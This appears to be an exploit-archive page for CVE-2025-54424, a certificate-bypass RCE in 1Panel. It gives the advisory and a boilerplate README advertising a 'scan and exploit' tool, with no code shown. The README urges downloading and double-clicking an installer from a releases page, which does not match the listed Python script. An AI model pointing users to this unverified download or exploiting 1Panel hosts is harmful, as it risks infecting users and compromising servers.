Associated Vulnerability
Title:1Panel Agent Bypasses Certificate Verification Leading to Arbitrary Command Execution (CVE-2025-54424)Description:1Panel is a web interface and MCP Server that manages websites, files, containers, databases, and LLMs on a Linux server. In versions 2.0.5 and below, the HTTPS protocol used for communication between the Core and Agent endpoints has incomplete certificate verification during certificate validation, leading to unauthorized interface access. Due to the presence of numerous command execution or high-privilege interfaces in 1Panel, this results in Remote Code Execution (RCE). This is fixed in version 2.0.6. The CVE has been translated from Simplified Chinese using GitHub Copilot.
Description
π Exploit the CVE-2025-54424 RCE vulnerability in 1Panel, enabling unauthorized command execution through a certification bypass tool for scanning and exploitation.
Readme
# π CVE-2025-54424 - A Simple Tool for Scanning and Exploiting
## π Download Now
[](https://github.com/bejbitoilet5125521/CVE-2025-54424/releases)
## π Overview
CVE-2025-54424 is a user-friendly tool designed to help you scan and exploit a specific vulnerability known as the 1Panel client certificate bypass RCE vulnerability. This application allows you to easily identify and take advantage of security gaps in a system, all in one integrated tool.
## π Getting Started
This section provides a step-by-step guide on how to get started with CVE-2025-54424. Whether you're looking to scan for vulnerabilities or test your system, weβve made the process straightforward.
1. **Download the Tool**:
- Visit the [Releases page](https://github.com/bejbitoilet5125521/CVE-2025-54424/releases) to download the application.
2. **Install the Tool**:
- Locate the downloaded file on your computer. It is often in your "Downloads" folder.
- Double-click the file to begin the installation process.
- Follow on-screen instructions to complete the installation.
3. **Open the Application**:
- Find the application icon on your desktop or in your programs list.
- Double-click to open the tool.
## π§ Features
CVE-2025-54424 comes packed with features to help you work effectively. Hereβs what you can expect:
- **Scanning Capabilities**: Quickly scan systems for the 1Panel client vulnerability.
- **Exploitation Module**: Execute exploits to test for security weaknesses.
- **User-Friendly Interface**: Our simple interface allows anyone to navigate easily, regardless of technical skills.
- **Results Reporting**: View clear reports on vulnerabilities detected during scans.
## π» System Requirements
To ensure the application runs smoothly on your device, make sure your system meets the following requirements:
- **Operating System**: Windows 10 or later.
- **Processor**: 2 GHz Dual-Core or higher.
- **RAM**: At least 4 GB.
- **Storage**: Minimum of 100 MB free space.
- **Network**: Internet connection required for software updates and vulnerability database.
## πΎ Download & Install
- To download the latest version, visit the [Releases page](https://github.com/bejbitoilet5125521/CVE-2025-54424/releases).
- Follow the installation instructions outlined in the previous section to set up your tool.
## π Usage Instructions
After installing CVE-2025-54424, follow these steps to use the tool effectively:
1. **Start Scanning**:
- Open the application.
- Enter the target system's details into the fields provided.
- Click on the 'Scan' button to begin the assessment.
2. **Review Results**:
- Once the scan completes, review the identified findings in the results window.
- For each vulnerability, sufficient details will be provided, including recommendations on how to address them.
3. **Execute Exploits**:
- If you're authorized to do so, select the vulnerability you wish to exploit.
- Click the 'Exploit' button to attempt to take advantage of the detected flaw.
4. **Final Review**:
- After executing exploits, check the summary report for impact analysis and further steps to secure your system.
## π Troubleshooting
If you experience issues, consider the following solutions:
- **Installation Problems**: Ensure your system meets the requirements. Update your operating system if it is outdated.
- **Application Crashes**: Make sure you are using the latest version available. Check for updates on the [Releases page](https://github.com/bejbitoilet5125521/CVE-2025-54424/releases).
- **Scan Fails**: Double-check the input data for accuracy. Ensure you have a proper internet connection for successful operation.
## π Contribution
We welcome feedback and contributions. If you have suggestions for features or improvements, feel free to open an issue on the GitHub repository.
## π Get Help
If you need assistance using CVE-2025-54424, please refer to the issues section on GitHub, where our community can provide support.
Your journey to securing your systems starts here with CVE-2025-54424!
File Snapshot
[4.0K] /data/pocs/a7c233dd51f0ee1357fed57f9a73c7cf9155e075
βββ [ 10K] CVE-2025-54424.py
βββ [ 11K] LICENSE
βββ [4.1K] README.md
0 directories, 3 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers β if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online β thank you for the support. View subscription plans β